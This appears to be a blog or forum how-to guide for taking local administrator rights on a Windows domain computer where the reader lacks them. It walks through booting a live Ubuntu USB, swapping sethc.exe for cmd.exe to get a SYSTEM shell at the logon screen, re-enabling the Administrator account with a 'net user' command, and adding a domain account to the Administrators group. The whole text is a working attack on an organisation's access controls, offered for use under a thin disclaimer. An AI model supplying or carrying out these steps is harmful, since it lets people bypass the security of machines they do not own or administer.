A Specific and Detailed Guide to Gaining Local Admin Access on a Windows Domain Computer

Note: Please use this guide only for legal/ethical purposes (e.g. system recovery). The "hack" tag is to attract search results away from damaging and dangerous procedures. This guide is easy, safe, and reversible.

So, let's say you're using a computer (probably a laptop) hooked up to a domain on which you do not have administrative rights, but you want to be a local administrator to install programs and whatnot. I have written this guide that walks you specifically through every step of doing so.

I am assuming you have these:

• A different computer on which you have local admin
• A USB flash drive of decent size, formatted FAT32
• Access to a USB port on the computer
• A contract that won't be violated when you do this
• Ability to boot from an alternate device

On a computer on which you are already an admin, go to Pen Drive Linux's web page for the USB installer. Press the big "Download UUI" button near the bottom of the page. Run the resulting application and accept the UAC prompt. Press "I Agree" after not reading the license terms. In the application, do this:

1. Select "Ubuntu" from the Step 1 list.
2. Check the "Download Link" box and press "Yes".
3. Wait for the download to finish.
4. Click Step 2's Browse button and choose the downloaded ISO.
5. Select your USB flash drive from the Step 3 list.
• If it doesn't appear, check "Show all Drives" and press "Yes".
6. Check the box to format the drive if you have a lot of junk on it.
7. Set the Step 4 slider to 0 MB.
8. Press Create.

Once the process finishes, eject the USB drive and use it to boot up the computer on which you wish to gain local admin. (If it doesn't boot into Ubuntu, you need to check BIOS settings. Unfortunately, there are many BIOSes, so I cannot document the process of changing the boot order settings.) Once it loads, choose your language and press the button to just try Ubuntu, not install it.

Disclaimer: I am not good at operating Linux and this may not be the most efficient way of accomplishing the task. It works, though.

Press the Activities text in the upper-left and choose Files (near the bottom of the resulting bar). Choose the hard drive name of the normal Windows installation and navigate to Windows\System32. (Navigation is very similar to that in Windows Explorer.) Find sethc.exe in the list, this is the program that is run when you press Shift five times (the ever-annoying StickyKeys). Rename it, for example to sethc_.exe. Find cmd.exe in the list, right-click it, and choose Copy To. Put it in the containing directory, Windows. Move up to find that copy we just made and rename it to sethc.exe by right-clicking it and choosing Rename. Right-click that and choose Move To, selecting the System32 directory.

You have just replaced the StickyKeys handler with the Command Prompt. This program will be run with administrative privileges at the logon screen.

Shut down Ubuntu using the power icon in the upper-right corner. Remove your flash drive and boot back into Windows. Press the Shift key five times to produce the Command Prompt. There, type the following command to reset the Administrator account's password (use whatever you like for the bold parameter):

net user Administrator wow_suchpassword /ACTIVE:YES

Close the Command Prompt and login using that local account. You will have to know your computer's name, which can be found in the convenient help link "How do I log on to another domain?". If your computer's name was Fleex255, you would use "Fleex255\Administrator" as the username. Enter the password you set in the previous step.

Once you're into that account, you own the machine! To elevate your normal user account, follow these steps:

1. Open Control Panel in Category view.
2. Choose Administrative Tools.
3. Choose Computer Management.
4. On the left in the resulting window, choose Local Users and Groups.
5. Enter the Groups folder.
6. Open the Administrators entry.
7. Click Add in the resulting dialog.
8. Enter your domain username and click OK.
9. Enter your domain username and password in the resulting box.
10. Click OK to close Administrators Properties.
11. Log off of the Administrator account.
12. Log into your normal domain account as usual.

Congratulations! You are now a full-power administrator of your realm, your local computer. Eventually, you should probably change the Administrator password to something better and use your new admin powers to restore that back-up copy of sethc.exe we made. (Or just go into Linux again if you don't want to jump through the hoops of NTFS ACLs.)

Disclaimer: This is not guaranteed to work forever. In fact, it's not even guaranteed to work now. I am not responsible for the consequences if you use this, don't use this, or use it incorrectly.